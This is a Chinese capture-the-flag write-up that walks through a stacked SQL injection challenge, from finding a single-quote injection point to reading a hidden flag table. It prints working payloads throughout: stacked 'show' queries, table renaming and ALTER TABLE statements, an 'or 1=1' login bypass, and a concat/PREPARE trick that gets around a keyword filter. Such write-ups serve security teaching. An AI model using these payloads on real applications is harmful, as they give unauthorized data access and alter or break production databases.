打开题目

输入1

 输入1'，页面报错，输入1' #页面正常

说明1为注入点且注入方式为字符型的单引号注入

判断列名

输入

1' order by 2 # 页面正常

1' order by 3 #页面报错

说明列名字段数为2

接下来我们尝试用联合注入的方式爆出数据显示位

输入1' union select 1,2 #

可以看到过滤了很多东西

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

说明我们用不了联合注入，因为过滤了union

我们尝试堆叠注入来查看有多少个数据库

1';show databases; #

我们查看表名

1';show tables; #

可以看到当前数据库下有两个表

1'; show columns from `1919810931114514`;#

这里查询表名使用反单引号
注意：在windows系统下，反单引号（`）是数据库、表、索引、列和别名用的引用符

在这里使用 ` 而不是 ’ 的一些解释：

两者在linux下和windows下不同，linux下不区分，windows下区分。

单引号 ’ 或双引号主要用于 字符串的引用符号

反勾号 ` 数据库、表、索引、列和别名用的是引用符是反勾号 (注：Esc下面的键)

有MYSQL保留字作为字段的，必须加上反引号来区分！！！

如果是数值，请不要使用引号。

可以看到有flag这个列

虽然我们已经得到了flag了，但是select被过滤了，而show命令又不能查看值。

这里看wp有一个其他思路

1.

让程序中已经存在的select语法帮我们进行查询，把words改名为其他，191这个表改名为words,然后再添加id字段，将flag字段改为data。

    先将 words 改为别的名字 比如 words2 或者其他
    然后将 1919810931114514 改为 words
    把属性名flag改为id，然后用1’ or 1=1;# 显示flag出来
    在这之前当然要先把words表改名为其他

payload：

1';rename table words to word2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100); #

"ALTER TABLE"用于更改表的结构，例如添加、删除或修改表的列，更改列的数据类型，添加或删除索引等。

VARCHAR(100)"是数据库表中列的数据类型和长度的定义。具体来说，"VARCHAR"表示这是一个可变长度字符串数据类型，而括号中的"100"表示该列可以存储的最大字符数为100

"int(10)"：这表示这是一个整数数据类型。括号中的数字（10）通常用于指定显示的宽度，但在大多数数据库管理系统中，它只是用于显示目的，而不会影响实际存储或范围。这个整数列将存储整数值。

"DEFAULT '12'"：这表示当插入一行时，如果没有为这个列提供值，将使用默认值'12'。这意味着如果没有明确指定值，新插入的行将自动在这个列中包含整数值12。

综合起来，"int(10) DEFAULT '12'"定义了一个整数列，它将存储整数值，并且如果没有提供值，则默认值为12。这意味着在插入新行时，如果没有显式提供这个列的值，它将自动设置为12。

然后我们用万能密码登录一下

1' or 1=1 #

得到flag

2.用concat拼接

1’;use supersqli;set @sql=concat('s','elect flag from 1919810931114514');PREPARE stmt1 FROM @sql;EXECUTE stmt1 #